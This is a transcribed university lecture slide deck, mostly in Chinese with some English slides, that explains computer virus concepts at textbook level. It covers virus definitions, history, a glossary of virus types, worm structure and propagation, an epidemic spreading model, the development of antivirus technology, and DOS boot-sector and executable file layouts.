病毒基本知识

Size: px
Start display at page:

Download "病毒基本知识"

Transcription

1 Lecture 4 计算机病毒 1

2 提纲 计算机病毒综述 计算机反病毒技术的发展 计算机病毒寄生环境分析 计算机病毒的触发机制 2

3 第一部分 计算机病毒概论 3

4 Which types of computer security incidents has your organization detected within the last 12 months? 4

5 Has your organization experienced unauthorized access to computer systems within the last 12 months? 5

6 What approximate dollar cost would you assign to the following types of incidents within the last 12 months? 6

7 If your organization has experienced a computer security incident within the last 12 months, which actions did your organization take? 7

8 Security technologies used by your organization

9 计算机病毒 计算机病毒的定义 中华人民共和国计算机信息系统安全保护条例 第二十八条中明确指出 : 计算机病毒, 是指编制或者在计算机程序中插入的破坏计算机功能或者毁坏数据, 影响计算机使用, 并能自我复制的一组计算机指令或者程序代码 此定义具有法律性 权威性 9

10 病毒发展 第一代病毒 第一代病毒的产生年限可以认为在 年之间, 这一期间出现的病毒可以称之为传统的病毒, 是计算机病毒的萌芽和滋生时期 具有如下的一些特点 病毒攻击的目标比较单一, 或者是传染磁盘引导扇区, 或者是传染可执行文件 病毒程序主要采取截获系统中断向量的方式监视系统的运行状态, 并在一定的条件下对目标进行传染 病毒传染目标以后的特征比较明显, 如磁盘上出现坏扇区, 可执行文件的长度增加 文件建立日期 时间发生变化, 等等 病毒程序不具有自我保护的措施, 容易被人们分析和解剖, 从而使得人们容易编制相应的消毒软件 10

11 病毒发展 第二代病毒 第二代病毒又称为混合型病毒, 其产生的年限可以认为在 年之间, 病毒由简单发展到复杂, 由单纯到成熟 这一阶段的计算机病毒具有如下特点 攻击目标趋于混合型, 传染引导扇区和可执行文件 不采用明显地截获中断向量的方法监视系统的运行, 而采取更为隐蔽的方法驻留内存和传染目标 病毒传染目标后没有明显的特征, 如磁盘上不出现坏扇区, 可执行文件的长度增加不明显 病毒程序往往采取了自我保护措施, 如加密技术 反跟踪技术, 增加了软件检测 解毒的难度 出现许多病毒的变种, 变种病毒较原病毒更隐蔽 11

12 病毒发展 第三代病毒 第三代病毒的产生年限可以认为从 年, 此类病毒称为 多态性 病毒 所谓 多态性 的含义是指此类病毒在每次传染目标时, 放入宿主程序中的病毒程序大部分都是可变的, 即在搜集到同一种病毒的多个样本中, 病毒程序的代码绝大多数是不同的, 这是此类病毒的重要特点 正是由于这一特点, 传统的利用特征码法检测病毒的产品不能检测出此类病毒 12

13 病毒发展 第四代病毒 90 年代中后期, 随着远程网 远程访问服务的开通, 病毒流行面更加广泛, 病毒的流行迅速突破地域的限制, 首先通过广域网传播至局域网内, 再在局域网内传播扩散 1996 年下半年随着国内 Internet 的大量普及, 的使用, 内的 WORD 宏病毒成为病毒主流 最大特点是利用 Internet 作为其主要传播途径, 传播快 隐蔽性强 破坏性大 此外, 随着 Windows 的应用, 出现了 Windows 环境下的病毒 这些都给病毒防治和传统 DOS 版杀毒软件带来新的挑战 13

14 Name Anti Anti-virus Virus Armored Virus Description Anti-antivirus viruses attack, disable or infect specific anti-virus software. Also: Retrovirus Any virus that tries to prevent analysis of its code. It can use one of many methods to do this. Bimodal Virus A virus that infects both boot records as well as files. Boot Sector Infector A virus that places its starting code in the boot sector. When the computer tries to read and execute the program in the boot sector, the virus goes into memory where it can gain control over basic computer operations. From memory, a boot sector infector can spread to other drives (floppy, network, etc.) on the system. Once the virus is running, it usually executes the normal boot program, which it stores elsewhere on the disk. Cavity Viruses A virus that overwrites a part of its host file without increasing the length of the file while also preserving the host's functionality in order to limit or deter detection. Companion Virus Companion viruses use a feature of DOS that allows software programs with the same name, but with different extensions, to operate with different priorities. The virus creates a program with a higher priority, ensuring its running instead of the original program. 14

15 Direct Action Virus Dropper Encrypted Virus Fast Infector A virus that immediately loads itself into memory, infects files, and then unloads itself. A carrier file that is used to hide the virus until it can be unloaded onto a system. An encrypted virus's code begins with a decryption algorithm and continues with scrambled or encrypted code for the remainder of the virus. Each time it infects, it automatically encodes itself differently, so its code is never the same. Through this method, the virus tries to avoid detection by antivirus software. Fast infector viruses, when active in memory, infect not only executed programs, but also those that are merely opened. Thus running an application, such as anti-virus software, which opens many programs but does not execute them, can result in all programs becoming infected. File Viruses Logic(Mail/Time) Bomb File viruses usually replace or attach themselves to COM and EXE files. They can also infect files with the extensions SYS, DRV, BIN, OVL and OVY. File viruses may be resident or non-resident, the most common being resident or TSR (terminate-and-stay-resident) viruses. Many non-resident viruses simply infect one or more files whenever an infected file runs. A logic bomb is a type of trojan horse that executes when specific conditions occur. Triggers for logic bombs can include a change in a file, by a particular series of keystrokes, or at 15a specific time or date

16 Macro Virus A macro virus is a malicious series of instructions designed to simplify repetitive tasks within a program. Macro viruses are written a macro programming language and attach to a document file (such as Word or Excel). When a document or template containing the macro virus is opened in the target application, the virus runs, does its damage and copies itself into other documents. Continual use of the program results in the spread of the virus Master Boot Sector Virus Master boot sector viruses infect the master boot sector of hard disks, though they spread through the boot record of floppy disks. The virus stays in memory, waiting for DOS to access a floppy disk. It then infects the boot record on each floppy disk DOS accesses. Memory Resistant Virus A virus that stays in memory after it executes and infects other files when certain conditions are met. Multipartite Virus Multipartite viruses use a combination of techniques including infecting documents, executables and boot sectors to infect computers. Most multipartite viruses first become resident in memory and then infect the boot sector of the hard drive. Once in memory, multipartite viruses may infect the entire system. 16

17 Mutating Virus A mutating virus changes, or mutates, as it progresses through its host files making disinfection more difficult. The term usually refers to viruses that intentionally mutate, though some experts also include non-intentionally mutating viruses. Overwriting Virus An overwriting virus copies its code over its host file's data, thus destroying the original program. Disinfection is possible, although files cannot be recovered. It is usually necessary to delete the original file and replace it with a clean copy. Polymorphic Virus Polymorphic viruses create varied (though fully functional) copies of themselves as a way to avoid detection from antivirus software. Some polymorphic virus use different encryption schemes and requires different decryption routines. Other polymorphic viruses vary instruction sequences and use false commands in the attempt to thwart anti-virus software. One of the most advanced polymorphic viruses uses a mutation-engine and random-number generators to change the virus code and its decryption routine. Program Infector A program infector virus infects other program files once an infected application is executed and the activated virus is loaded into memory. 17

18 Resident Virus Self-Encrypting Virus Self-Garbling Virus Sparse Infector A resident virus loads into memory and remains inactive until a trigger event. When the event occurs the virus activates, either infecting a file or disk, or causing other consequences. All boot viruses are resident viruses and so are the most common file viruses. Self-encrypting viruses attempt to conceal themselves from anti-virus programs. Most anti-virus programs attempt to find viruses by looking for certain patterns of code (known as virus signatures) that are unique to each virus. Self-encrypting viruses encrypt these text strings differently with each infection to avoid detection. A self-garbling virus attempts to hide from anti-virus software by garbling its own code. When these viruses spread, they change the way their code is encoded so anti-virus software cannot find them. A small portion of the virus code decodes the garbled code when activated. A sparse infector viruses use conditions before infecting files. Examples include files infected only on the 10th execution or files that have a maximum size of 128kb. These viruses use the conditions to infect less often and therefore avoid detection. 18

19 Stealth Virus Stealth viruses attempt to conceal their presence from antivirus software. Many stealth viruses intercept disk-access requests, so when an anti-virus application tries to read files or boot sectors to find the virus, the virus feeds the program a "clean" image of the requested item. Other viruses hide the actual size of an infected file and display the size of the file before infection. Stealth viruses must be running to exhibit their stealth qualities. Trojan Horse Program A Trojan horse program is a malicious program that pretends to be a benign application; a Trojan horse program purposefully does something the user does not expect. Trojans are not viruses since they do not replicate, but Trojan horse programs can be just as destructive. Worm Worms are parasitic computer programs that replicate, but unlike viruses, do not infect other computer program files. Worms can create copies on the same computer, or can send the copies to other computers via a network. Worms often spread via IRC (Internet Relay Chat). Zoo Virus A zoo virus exists in the collections of researchers and has never infected a real world computer system 19

20 History 1949: John Von Nuemann Theory and Organization of Complicated Automata 1981: The First Virus Apple Computers at Texas A&M 1983: Cohen s PhD Mathematical Virus 1986: Basit and Amjad Pakistan Brain 1988: Jerusalem Released 1990: First Anti-Virus: Norton by Symantec 1991: Polymorphic Viruses introduced 1992: 420% increase since : Windows 95 and the Macro Virus 1996: Java Code Virus Today: 100,

21 计算机病毒年谱 -DOS 引导阶段 1987 年, 计算机病毒主要是引导型病毒, 具有代表性的是 小球 和 石头 病毒 当时得计算机硬件较少, 功能简单, 一般需要通过软盘启动后使用 引导型病毒利用软盘得启动原理工作, 它们修改系统启动扇区, 在计算机启动时首先取得控制权, 减少系统内存, 修改磁盘读写中断, 影响系统工作效率, 在系统存取磁盘时进行传播 21

22 计算机病毒年谱 -DOS 可执行阶段 1989 年, 可执行文件型病毒出现, 它们利用 DOS 系统加载执行文件的机制工作, 代表为 耶路撒冷 星期天 病毒 病毒代码在系统执行文件时取得控制权, 修改 DOS 中断, 在系统调用时进行传染, 并将自己附加在可执行文件中, 使文件长度增加 1990 年, 发展为复合型病毒, 可感染 COM 和 EXE 文件 22

23 计算机病毒年谱 - 伴随, 批次型阶段 1992 年伴随型病毒出现, 利用 DOS 加载文件优先顺序工作, 具有代表性的是 金蝉 病毒 它感染 EXE 文件时生成一个和 EXE 同名的扩展名为 COM 伴随体 它感染 COM 文件时, 改为原来的 COM 文件为同名的 EXE 文件, 在产生一个原名的伴随体, 文件扩展名为 COM 这样, 在 DOS 加载文件时, 病毒就取得控制权 23

24 计算机病毒年谱 - 多形阶段 1994 年, 随着汇编语言的发展, 实现同一功能可以用不同的方式进行完成, 这些方式的组合使一段看似随机的代码产生相同的运算结果 多形型病毒是一种综合性病毒, 它既能感染引导区又能感染程序区 24

25 计算机病毒年谱 - 生成器, 变体机阶段 1995 年在汇编语言中, 一些数据的运算放在不同的通用寄存器中, 可运算出同样的结果, 随机的插入一些空操作和无关指令, 也不影响运算的结果, 这样一段算法就可以由生成器生成 当生成的是病毒时, 这种复杂的称之为病毒生成器和变体机就产生了 具有典型代表的是 病毒制造机 VCL, 它可以在瞬间制造出成千上万种不同的病毒, 查解时就不能使用传统的特征识别法, 需要在宏观上分析指令, 解码后查解病毒 变体机就是增加解码复杂程度的指令生成机制 25

26 计算机病毒年谱 - 网络, 蠕虫阶段 1995 年随着网络的普及, 病毒开始利用网络进行传播, 它们只是以上几代病毒的改进 在非 DOS 操作系统中, 蠕虫 是典型的代表, 它不占用除内存以外的任何资源, 利用网络功能搜索网络地址, 将自身向下一地址进行传播, 有时也在网络服务器和启动文件中存在 26

27 计算机病毒年谱 - 宏病毒阶段 1996 年随着 Windows Word 功能的增强, 使用 Word 宏语言也可以编制病毒, 这种病毒使用类 Basic 语言, 编写容易, 感染 Word 文档文件 在 Excel 和 AmiPro 出现的相同工作机制的病毒也归为此类 由于 Word 文档格式没有公开, 这类病毒查解比较困难 27

28 计算机病毒年谱 - 互连网阶段 1997 年随着因特网的发展, 各种病毒也开始利用因特网进行传播, 一些携带病毒的数据包和邮件越来越多, 如果不小心打开了这些邮件, 机器就有可能中毒 28

29 计算机病毒年谱 - 爪哇, 邮件炸弹阶段 1997 年随着万维网上 Java 的普及, 利用 Java 语言进行传播和资料获取的病毒开始出现, 典型的代表是 JavaSnake 病毒 还有一些利用邮件服务器进行传播和破坏的病毒, 例如 Mail-Bomb 病毒, 它就严重影响因特网的效率 29

30 病毒的命名 1. 多视角命名 规则 产生如下的情况 不同的病毒有不同的名称 多种不同的病毒按相同的视角而被认为是同一个病毒 同一个病毒可能有多种不同的名称 30

31 病毒的命名 1. 多视角命名 规则 黑色星期五 它攻击所有的.COM 文件和.EXE 文件, 使这两种文件增加 1808 字节, 且每运行一次都增加 1808 字节, 直到占满整个磁盘空间为止 病毒进入内存以后大约三十分钟, 屏幕左下方出现长方形亮块或作有规律闪动, 有时候还伴随着条形花纹 到了机内系统日期是 13 日又恰逢星期五, 病毒就开始大发作, 给用户造成极大损失 31

32 方法序号 命名方法病毒名称备注 1 触发时间 黑色星期五病毒 2 表现症状 长方块病毒, 开窗口病毒 3 传染方式 疯狂复制病毒 4 发现地点 Jerusalem 病毒 5 对感染文件增加的长度 1813 病毒, 1808 病毒 6 自身宣布的名称 Stoned 病毒 7 宣布的编写时间 4 月 1 日病毒 8 宣布的编写者 Ogre 病毒 9 病毒出现的字符串 Sunday 病毒 10 病毒标示 Liberty 病毒 从 5 个不同的视角对同一个病毒的 5 种命名方法, 产生了 7 个不同的病毒名 从 5 个不同的视角分别对 5 个不同的病毒命名方法 32

33 病毒的命名 2. 三元组命名 规则 三元 : 计算机病毒的类型 名称和重要性 [ 前缀.] 病毒名 [. 后缀 ] 前缀 = 该病毒发作的 OS 该病毒的类型名 病毒名 = 该病毒的名称及其家族 后缀 = 字母 阿拉伯数字 33

34 病毒的命名 2. 三元组命名 规则 WM.concept.a 含义 :a 表示在 Concept 病毒家族的一个变种,WM 即 Word Macro 的英文缩写, 表示该病毒是一个 Word 宏病毒 34

35 病毒 蠕虫和木马 病毒 病毒是附着于程序或文件中的一段计算机代码, 它可在计算机与计算机之间传播, 并在传播途中感染计算机 病毒可破坏软件 硬件和文件 病毒代码的明确目的 : 自我复制 病毒尝试将自身附加至主程序来在计算机之间进行传播 与蠕虫病毒相比, 它可破坏硬件 软件和信息 与人体病毒的严重程度分类一样, 计算机病毒也有轻重之分, 轻者仅产生一些干扰, 重者彻底摧毁设备 令人庆幸的是, 如果没有人为干预, 实际病毒是不会独自传播的 ( 如共享文件或发送电子邮件 ) 35

36 病毒 蠕虫和木马 蠕虫 与病毒类似, 蠕虫也在计算机与计算机之间自我复制, 但蠕虫病毒可自动完成复制过程, 因为它接管了计算机中传输文件或信息的功能 蠕虫可以看作是病毒的子类 通常, 蠕虫传播无需人为干预, 并可通过网络自我复制 ( 可能有改动 ) 与病毒相比, 蠕虫可消耗内存或网络带宽, 并导致计算机停止响应 36

37 病毒 蠕虫和木马 特洛伊木马 现在, 特洛伊木马是一些表面有用的软件程序, 实际目的是危害计算机安全性并破坏计算机 最近的特洛伊木马都以电子邮件的形式传播 邮件的附件声称是某些 OS 的安全更新程序, 但实际上是一些试图禁用防病毒软件和防火墙软件的病毒 37

38 蠕虫 - 定义 蠕虫的定义 Internet 蠕虫是无须计算机使用者干预即可运行的独立程序, 它通过不停的获得网络中存在漏洞的计算机上的部分或全部控制权来进行传播 蠕虫与病毒的最大不同在于它不需要人为干预, 且能够自主不断地复制和传播 38

39 蠕虫 - 特点 蠕虫程序具有以下四个方面的特点 : (1) 利用操作系统和应用程序的漏洞主动进行攻击 (2) 传播方式多样, 可利用的传播途径有 : 文件 电子邮件 Web 服务器 网络共享等等 (3) 病毒制作技术新 利用最新的编程语言和编程技术实现的, 易于修改并产生新的变种, 从而逃避反病毒软件的搜索 另外, 新病毒利用 Java ActiveX VB Script 等技术, 可潜伏在 HTML 页面里, 在上网浏览时触发 (4) 与各种黑客技术相结合 如 : 漏洞扫描 39

40 蠕虫 - 基本结构 蠕虫的基本结构 一般认为, 蠕虫程序由三部分模块构成 : 传播模块 : 负责蠕虫的传播 隐藏模块 : 侵入主机后, 隐藏蠕虫程序, 防止被用户发现 目的功能模块 : 实现对计算机的控制 监视或破坏等功能 40

41 蠕虫 - 基本结构 蠕虫的基本结构 其中, 传播模块又可以分为三个基本模块 扫描模块 : 由蠕虫的扫描功能模块负责探测存在漏洞的主机 当程序向某个主机发送探测漏洞的信息并收到成功的反馈信息后, 就得到一个可传播的对象 攻击模块 : 攻击模块按漏洞攻击步骤自动攻击上一步骤找到的对象, 取得该主机的权限 ( 一般为管理员权限 ), 获得一个 shell 复制模块 : 复制模块通过原主机和新主机的交互将蠕虫程序复制到新主机并启动 41

42 蠕虫 - 传播分析 蠕虫采用的自动入侵技术大致分为三步 : 1. 用各种方法收集目标主机的信息, 找到可利用的漏洞或弱点 2. 针对目标主机的漏洞或缺陷, 采取相应的技术攻击主机, 直到获得主机的管理员权限 3. 利用获得的权限在主机上安装后门 跳板 控制端 监视器等等, 清除日志 42

43 蠕虫 - 传播分析 通常采用的扫描策略 随机选取某一段 IP 地址, 然后对这一地址段上的主机扫描, 并不断重复这一过程 随着蠕虫的传播, 新感染的主机也开始进行这种扫描, 这些扫描程序不知道那些地址已经被扫描过, 它只是简单地随机扫描互联网 于是蠕虫传播得越广, 网络上的扫描包就越多 即使扫描程序发出的探测包很小, 积少成多, 大量蠕虫程序的扫描引起的网络拥塞就非常严重了 43

44 蠕虫 - 传播分析 改进的扫描策略 有的程序会对扫描策略进行一些改进 比如在 IP 地址段的选择上, 可以主要针对当前主机所在的网段扫描 对外网段则随机选择几个小的 IP 地址段进行扫描 对扫描次数进行限制, 并把扫描分散在不同的时间段进行 44

45 蠕虫 - 传播分析 扫描策略设计的三个原则 尽量减少重复的扫描, 使扫描发送的数据包总量减少到最小 保证扫描覆盖到尽量大的范围 处理好扫描的时间分布, 使得扫描不集中在某一时间段内 45

46 蠕虫 - 传播分析 扫描发送的探测包是根据不同的漏洞进行设计的 一旦确认漏洞存在后就可以进行相应的攻击步骤, 不同的漏洞有不同的攻击手法, 只要明白了漏洞的利用方法, 在程序中实现这一过程就可以了 攻击成功后, 一般是获得一个远程主机的 shell 复制过程也有很多种方法, 可以利用系统本身的程序实现, 也可以用蠕虫自带的程序实现 复制过程实际上就是一个文件传输的过程 46

47 蠕虫 - 传播途径 1. 利用漏洞 利用漏洞也是网络蠕虫的一个最显著的特点 网络蠕虫就是利用计算机系统存在的漏洞去编写代码攻击计算机网络的 网络蠕虫攻击时, 首先探测目标计算机存在的漏洞, 然后根据探测到的漏洞建立传播路径, 最后实施攻击 振荡波 -Worm.Sasser 蠕虫利用的是 LSASS 服务漏洞 冲击波蠕虫病毒都是利用的 RPC Dcom 缓冲溢出漏洞 47

48 蠕虫 - 传播途径 2. 依赖 传播 以电子邮件附件的形式进行传播是网络蠕虫采用的主要传播方式, 蠕虫编写者通过向用户发送电子邮件, 用户在不知情的情况下点击电子邮件附件时, 网络蠕虫就会感染此计算机 所以用户不要轻易点击陌生人的电子邮件, 以免感染网络蠕虫 影响范围较广的网络天空 贝革热和小邮差等蠕虫病毒都是利用电子邮件传播的 48

49 蠕虫 - 传播途径 3. 依赖网络共享网络共享是网络蠕虫传播的重要途径之一, 网络蠕虫利用共享网络资源进行传播 所以用户不要随意设置可写的共享文件夹, 以免被网络蠕虫利用比如经常作怪的尼达姆蠕虫病毒就是利用网络共享进行传播的 49

50 蠕虫 - 传播途径 4. 弱密码攻击若用户的密码很容易猜测, 网络蠕虫则会在攻克了用户密码后进入计算机并获得其控制权 所以用户应该设置复杂的密码, 增加破解难度 50

51 蠕虫 - 与一般病毒的异同 蠕虫病毒与一般病毒的异同病毒类型 : 普通病毒存在形式 : 寄存文件传染机制 : 宿主程序运行传染目标 : 本地文件 蠕虫病毒独立程序主动攻击网络计算机 51

52 病毒的基本结构 虽然不同类型的病毒采用的机制和表现手法不尽相同, 但其结构基本相似 一般说来, 它由三个程序模块组成 病毒引导模块 病毒传染模块 病毒破坏表现模块 52

53 病毒的基本结构 引导模块 将病毒引入内存, 使传染和破坏表现模块处于活动状态 保护内存中的病毒代码不被覆盖 设置病毒的激活条件和触发条件 53

54 病毒的基本结构 传染模块 判断传染条件是否成立 如果条件成立, 将病毒程序链接到宿主程序, 实施病毒的传染过程 54

55 病毒的基本结构 破坏表现模块 判断破坏表现条件是否成立 所有的条件都满足时, 实施病毒的破坏表现功能 55

56 Steps in Normal Program Execution Main memory is empty at the beginning 0x0 BIOS locates & copies OS from disk to memory 0x0 OS OS locates & copies Program A starts the program to be executing executed into memory 0x0 0x0 OS OS Program A Program A Main Memory (volatile) BIOS code 2 ROM (non-volatile) 1 Hard Disk (non-volatile) OS A FAT : File Allocation Table stores the location of all files on the system. It is maintained by the OS. 4 3 FAT Executing programs use the OS to perform standard functions like, reading and writing files etc 56

57 Virus Infection Mechanism Infected program enters memory 0x0 OS Virus searches for a suitable program to infect 0x0 OS Virus copies itself into the target program 0x0 in memory OS Virus copies the infected target back into the disk 0x0 OS Program A Program A Program A Program A Virus Virus Virus Virus Program B Program B Virus 4 1 From infected floppy disk or an attachment FAT Hard Disk 2 OS 3 B Virus copies the target program to main memory Virus makes use of OS constructs to search for target files, copying etc 5 Hard Disk OS B + virus When program B is executed 57 it infects a new file

58 Virus Infecting a File 1 st instruction 2 nd instruction End program A Program A Viral Infection Jump 2 nd instruction Program A End program A 1 st instruction Virus 1 st instruction Jump Program A infected with virus In in the execution of the infected program, the virus is executed before program A, and the correct sequence of instruction execution In program A is maintained 58

59 病毒程序的工作机理 病毒的引导机理 对于 MS-DOS 而言, 当该系统启动时 首先由系统调入引导扇区记录并执行之 然后将 DOS 调入内存 病毒的引导模块率先将自身的程序代码引入并驻留内存 59

60 病毒程序的工作机理 病毒的引导机理 病毒代码驻留内存的两个策略 通过程序驻留 把病毒代码转移到内存高端并占有该范围的部分空间, 以便病毒代码不能被覆盖 60

61 病毒程序的工作机理 病毒的传染机理传染是病毒的最本质的特征之一传染途径有 通过磁盘引导扇区进行传染 通过操作系统文件进行传染 通过应用程序进行传染 61

62 Framework The network of computers consists of nodes (computers) and edges (links between nodes) Each node is in one of two states Susceptible (in other words, healthy) Infected Infected by neighbor Susceptible-Infected-Susceptible (SIS) model Susceptible Infected Cured nodes immediately Cured become susceptible internally 62

63 Framework (Continued) Homogeneous birth rate β on all edges between infected and susceptible nodes Homogeneous death rate δ for infected nodes Prob. β Prob. δ N2 Healthy N1 X Prob. β Infected N3 63

64 Outline Introduction Classical models and their limitations Modeling viral propagation in arbitrary network topologies Epidemic threshold and eigenvalues Experiments Conclusions 64

65 Power-law Networks Many real world networks exhibit power-law characteristics Probability that a node has k links: P(k) = ck γ γ = power law exponent The Internet: 2 γ 3 and still evolving [Faloutsos+ 99, Ripeanu+ 02] 65

66 Power-law Networks Model for Barabási-Albert networks (PL-3) [Pastor-Satorras & Vespignani, 01, 02] Prediction limited to BA type networks which only allow powerlaws of exponent γ = 3 66

67 Power-law Networks Model for correlated (Markovian) networks [Boguñá-Satorras 02] Additional distribution for neighbor degree correlation: P(k k ) Difficult to find/produce P(k k ) in arbitrary networks Such correlations have yet to 67

68 Topology-independent epidemic model Takes topological characteristics into account without being limited by them Discrete time A node is healthy at time t if it Was healthy before t and not infected at t N2 Healthy N1 X Infected N3 68

69 Topology-independent epidemic model Takes topological characteristics into account without being limited by them Discrete time A node is healthy at time t if it Was healthy before t and not infected at t OR Was infected before t, cured and Healthy not reinfected at t N2 N1 X Infected N3 69

70 Topology-independent epidemic model Takes topological characteristics into account without being limited by them Discrete time A node is healthy at time t if it Was healthy before t and not infected at t OR Was infected before t, cured and not Healthy reinfected at t OR N2 Was infected before t, therefore ignored reinfection N1attempts and X was subsequently cured at t Infected N3 70

71 71 Topology-independent epidemic model Deterministic time evolution of infection 1 - p i,t : probability node i is healthy at time t ζ k,t : probability a k-linked node will not receive infections from its neighbors at time t Assume probability of curing before infection attempts 50% Solve numerically = + + = = : neighbor 1,,, 1, 2 1, 1,, 1,,, ) (1 ) (1 ) (1 1 j t j t k t k t i t k t i t k t i t i i t i t p p p p p p β ζ ζ δ ζ δ ζ η Equation 1

72 第二部分 计算机反病毒技术的发展 72

73 计算机反病毒技术的发展 第一代反病毒技术 是采取单纯的病毒特征代码分析, 将病毒从带毒文件中清除掉 这种方式可以准确地清除病毒, 可靠性很高 后来病毒技术发展了, 特别是加密和变形技术的运用, 使得这种简单的静态扫描方式失去了作用 随之而来的反病毒技术也发展了一步 73

74 计算机反病毒技术的发展 第二代反病毒技术 是采用静态广谱特征扫描方法检测病毒, 这种方式可以更多地检测出变形病毒 特征码的获取不可能再是简单的取出一段代码来, 而是分段的, 中间可以包含任意的内容 ( 也就是增加了一些不参加比较的 掩码字节, 在出现 掩码字节 的地方, 出现什么内容都不参加比较 ) 这就是曾经提出的广谱特征码的概念 但另一方面误报率也提高, 尤其是用这种不严格的特征判定方式去清除病毒带来的风险性很大, 容易造成 74 文件和数据的破坏

75 计算机反病毒技术的发展 第三代反病毒技术 将静态扫描技术和动态仿真跟踪技术结合起来, 将查找病毒和清除病毒合二为一, 形成一个整体解决方案 能够全面实现防 查 杀等反病毒所必备的各种手段, 以驻留内存方式防止病毒的入侵, 凡是检测到的病毒都能清除, 不会破坏文件和数据 75

76 计算机反病毒技术的发展 第四代反病毒技术 针对计算机病毒的发展而基于病毒家族体系的命名规则 基于多位 CRC 校验和扫描机理, 启发式智能代码分析模块 动态数据还原模块 ( 能查出隐蔽性极强的压缩加密文件中的病毒 ) 内存解毒模块 自身免疫模块等先进的解毒技术 较好解决了以前防毒技术顾此失彼 此消彼长的状态 76

77 第三部分 计算机病毒寄生环境分析 77

78 3.1 磁盘引导区结构 - 主引导扇区 主引导扇区位于整个硬盘的 0 磁道 0 柱面 1 扇区, 包括 硬盘主引导记录 MBR(Main Boot Record) 分区表 DPT(Disk Partition Table) 功能介绍 : 主引导记录的作用是检查分区表是否正确及确定哪个分区为引导分区, 并在程序结束时把该分区的启动程序 ( 也就是操作系统引导扇区 ) 调入内存执行 MBR 是由分区程序 ( 例如 DOS 的 Fdisk.exe) 产生的, 不同的操作系统可能这个扇区是不尽相同 分区表, 以 80H 或 00H 为开始标志, 以 55AAH 为结束标志, 共 64 字节, 位于本扇区的最末端 78

79 3.1 磁盘引导区结构 - 操作系统引导扇区 OBR(OS Boot Record) 即操作系统引导扇区, 通常位于硬盘的 0 磁道 1 柱面 1 扇区 ( 对于 DOS), 是操作系统可直接访问的第一个扇区, 包括 一个引导程序 一个被称为 BPB(BIOS Parameter Block) 的本分区参数记录表 OBR 由高级格式化程序产生, 例如 DOS 的 Format.com 引导程序的主要任务是判断本分区根目录前两个文件是否为操作系统的引导文件 ( 例如 MSDOS 或者起源于 MSDOS 的 Win9x/Me 的 IO.SYS 和 MSDOS.SYS) 如是, 就把第一个文件读入内存, 并把控制权交予该文件 BPB 参数块记录着本分区的起始扇区 结束扇区 文件存储格式 硬盘介质描述符 根目录大小 FAT 个数 分配单元 ( 也称之为簇 ) 的大小等重要参数 79

80 3.1 磁盘引导区结构 - 文件分配表 FAT(File Allocation Table) 即文件分配表, 是 DOS/Win9x 系统的文件寻址系统, 为了数据安全起见,FAT 一般做两个, 第二 FAT 为第一 FAT 的备份 FAT 区紧接在 OBR 之后 关于 FAT 的格式历来有很多选择,Microsoft 的 DOS 及 Windows 采用我们所熟悉的 FAT12 FAT16 和 FAT32 格式, 但除此以外并非没有其它格式的 FAT, 像 Windows NT OS/2 UNIX/Linux Novell 等都有自己的文件管理方式 80

81 3.1 磁盘引导区结构 - 目录区 DIR 是 Directory 即根目录区的简写,DIR 紧接在第二 FAT 表之后, 只有 FAT 还不能定位文件在磁盘中的位置,FAT 还必须和 DIR 配合才能准确定位文件的位置 DIR 记录着每个文件 ( 目录 ) 的起始单元 ( 这是最重要的 ) 文件的属性等 定位文件位置时, 操作系统根据 DIR 中的起始单元, 结合 FAT 表就可以知道文件在磁盘的具体位置及大小 在 DIR 区之后, 才是真正意义上的数据存储区, 即 DATA 区 81

82 3.1 磁盘引导区结构 - 数据区 DATA 占据了硬盘的绝大部分空间 在这里有一点要说明的是, 我们通常所说的格式化程序 ( 指高级格式化, 例如 DOS 下的 Format 程序 ), 并没有把 DATA 区的数据清除, 只是重写了 FAT 表而已, 至于分区硬盘, 也只是修改了 MBR 和 OBR, 绝大部分的 DATA 区的数据并没有被改变, 这也是许多硬盘数据能够得以修复的原因 82

83 3.1 磁盘引导区结构 引导型病毒 引导型病毒是一种在 ROM BIOS 之后, 系统引导时出现的病毒, 它先于操作系统, 依托的环境是 BIOS 中断服务程序 引导型病毒是利用操作系统的引导模块放在某个固定的位置, 并且控制权的转交方式是以物理位置为依据, 而不是以操作系统引导区的内容为依据, 因而病毒占据该物理位置即可获得控制权, 而将真正的引导区内容搬家转移或替换, 待病毒程序执行后, 将控制权交给真正的引导区内容, 使得这个带病毒的系统看似正常运转, 而病毒已隐藏在系统中并伺机传染 发作 83

84 COM 文件的装入 COM 文件和 EXE 文件是 DOS 的二种二进制代码的可执行文件 COM 文件中的程序代码只在一个段内运行, 文件长度不超过 64K 字节, 其结构比较简单 EXE 文件则不同, 它可使用多个段, 文件长度可大于 64K, 在装入内存时涉及重定位问题, 因而其结构较复杂 84

85 COM 文件的装入 由于 COM 文件与 EXE 文件在结构上的不同, 它们在调入执行时也有很大差别 COM 文件在调入时, DOS 将全部可用内存分配给用户程序 四个寄存器 DS(Data Segment 数据段 ) CS(Code Segment 代码段 ) SS(Stack Segment 堆栈段 ) ES(Extra Segment 附加段 ) 全部指向程序段前缀 (PSP, 由 DOS 建立, 是 DOS 用户程序及命令行之间的接口 ) 的段地址 指令指针 IP 置为 0100h, 从程序的第一条指令开始执行 ; 栈指针 SP 置为程序段的末尾 85

86 EXE 文件的装入 EXE 文件由文件头 (Header) 和重装入模块 (Load Module) 两大部分组成 文件头又由格式化区 (Format Area) 和重定位表 (Relocation Table) 组成 前者长 28 字节 后者紧接格式化区之后, 长度不定, 重定位项数等于程序段数, 在格式化区位移量为 06-07h 处指出 装入模块为程序代码部分, 从偏移量 512 字节开始 86

87 EXE 文件的装入 EXE 文件在申请内存后, 把装入模块读入内存指定区域 ( 尽量装入内存高地址 ) DS ES 指向程序段前缀 PSP 而不是指向用户程序的数据段和附加段 CS IP SS SP 由用户程序的文件头的格式化区域确定并通过再定位调整 87

88 COM 文件的调入执行 地址内容 xxxx:0000 CS DS SS ES 段寄存器 xxxx:0000 PSP IP 指令指针 程序代码 数据 堆栈 SP 堆栈 88

89 EXE 文件的调入执行 EXE 文件的调入执行地址内容 xxxx:0000 DS ES 段寄存器 xxxx:0000 PSP DS:0100 数据 CS:IP 代码 SS:SP 堆栈 89

90 VxD 文件结构 VxD 虚拟设备驱动程序, 顾名思义 VxD 是用来控制硬件设备的 VxD 可以完成许多 API 不能完成的功能 VxD 不仅仅可以用来控制硬件设备, 因为 VxD 工作在 保护模式 Ring 0 特权级 ( 最高特权级 ) 上, 而一般的应用程序工作在 Ring 3 特权级 ( 最低特权级 ) 上, 例如端口读写 物理内存读写 中断调用 API 拦截等 90

